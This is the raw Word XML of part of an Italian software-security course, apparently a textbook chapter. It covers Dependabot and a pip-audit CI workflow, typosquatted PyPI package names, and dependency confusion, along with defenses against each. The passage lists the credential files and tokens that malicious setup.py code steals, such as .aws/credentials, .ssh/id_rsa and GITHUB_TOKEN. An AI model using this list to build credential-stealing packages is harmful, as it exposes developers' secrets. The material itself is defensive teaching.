      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La backdoor era nelle release ufficiali firmate dal manutentore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ufficiale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Le firme dimostrano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">chi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ha fatto la release, non</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se è sicura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="393"/>
    <w:bookmarkEnd w:id="394"/>
    <w:bookmarkStart w:id="397" w:name="github-dependabot"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="557" w:name="sec_9_5"/>
      <w:r>
        <w:t xml:space="preserve">9.5 GitHub Dependabot</w:t>
      </w:r>
      <w:bookmarkEnd w:id="557"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lo lanci a mano. Per un’app reale serve qualcosa di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">automatico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dependabot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è il servizio di GitHub che fa esattamente questo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1147"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Scansiona</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quotidianamente tutte le dipendenze del tuo repository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1147"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Apre Pull Request automatiche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quando trova vulnerabilità, con la versione patchata</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1147"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Genera advisory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">privati nel tuo repository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1147"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Avvisa via email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">i manutentori</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="395" w:name="configurazione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configurazione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel repository del progetto, crea il file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.github/dependabot.yml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2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">updates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package-ecosystem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"pip"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">directory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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"weekly"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">open-pull-requests-limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dependabot controllerà le dipendenze ogni settimana e aprirà PR con gli aggiornamenti. Per le vulnerabilità di sicurezza, le PR vengono aperte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">immediatamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non solo settimanalmente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Funziona per: pip (Python), npm (JavaScript), Maven (Java), NuGet (.NET), Cargo (Rust), Composer (PHP), Bundler (Ruby), Go modules, Docker, GitHub Actions, e altri.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="395"/>
    <w:bookmarkStart w:id="396" w:name="pipeline-ci-con-audit-automatico"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pipeline CI con audit automatico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configura GitHub Actions per bloccare i merge se nuove vulnerabilità sono introdotte. File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.github/workflows/security.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Audit</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8 * * 1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  # ogni lunedì alle 8:00 UTC</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audit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pip-audit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Audit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pip-audit --strict --desc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--strict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fa fallire il job se trova</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">qualunque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vulnerabilità (configurabile per ignorare quelle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">low</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Combinato con la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">branch protection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di GitHub, impedisce il merge a main se ci sono vulnerabilità.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="396"/>
    <w:bookmarkEnd w:id="397"/>
    <w:bookmarkStart w:id="401" w:name="X3c038b810d12fede859c77409af857ba7f50ee4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="558" w:name="sec_9_6"/>
      <w:r>
        <w:t xml:space="preserve">9.6 Vettori 3-4: typosquatting e dependency confusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="558"/>
    </w:p>
    <w:bookmarkStart w:id="398" w:name="typosquatting-in-pratica"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Typosquatting in pratica</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I gestori di pacchetti come PyPI e npm sono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">liberi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: chiunque può pubblicare. Decine di pacchetti malevoli vengono pubblicati ogni settimana, con nomi vicini a librerie popolari.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempi pubblicati nel 2023-2024 e poi rimossi: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Libreria legittima</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tipo malevolo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">colorama</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">colourama</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(con la u)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">requets</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">request</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(singolare)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">numpy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">nympy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">torch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">torcvision</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">crypto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">crpyto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa fanno questi pacchetti? Tipicamente:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">setup.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">esegue codice all’installazione (era una scelta di design di pip ormai considerata sbagliata), e quel codice esfiltra:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Variabili d’ambiente (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS_SECRET_ACCESS_KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ecc.)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Storia bash (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.bash_history</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.aws/credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.ssh/id_rsa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Dump del browser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un singolo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di un pacchetto sbagliato può</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">svendere completamente la macchina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="398"/>
    <w:bookmarkStart w:id="399" w:name="difese-contro-typosquatting"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Difese contro typosquatting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Copia/incolla i nomi dei pacchetti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dalle pagine ufficiali, non scriverli a memoria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Verifica i numeri di download</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su PyPI. Un pacchetto popolare ha milioni di download. Un typosquat in genere ha qualche centinaio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Controlla la data di pubblicazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Pacchetti pubblicati negli ultimi giorni e con pochi download sono sospetti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Usa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pip install --require-hashes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in produzione, fissando l’hash esatto di ogni pacchetto.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="399"/>
    <w:bookmarkStart w:id="400" w:name="dependency-confusion-cenno"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dependency Confusion (cenno)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Spiegata bene nel 2021 dall’articolo di Alex Birsan che ha</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">violato Apple, Microsoft, PayPal, Tesla e altre 30+ aziende</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in un solo esperimento di sicurezza, raccogliendo $130.000 di bug bounty.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Schema: l’azienda usa pacchetti privati interni (es.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">azienda-utils</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Configura pip per cercare prima nel proprio registro privato, poi su PyPI pubblico. Birsan pubblica su PyPI un pacchetto chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">azienda-utils</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con versione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">99.0.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Pip, vedendo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">una versione più alta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, la sceglie. Il codice di Birsan si esegue dentro le pipeline di build delle aziende.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: configurare pip/npm per cercare i pacchetti privati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">solo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dal registro privato (non come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">preferenza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ma come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">esclusività</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), e/o usare prefissi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">scope</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
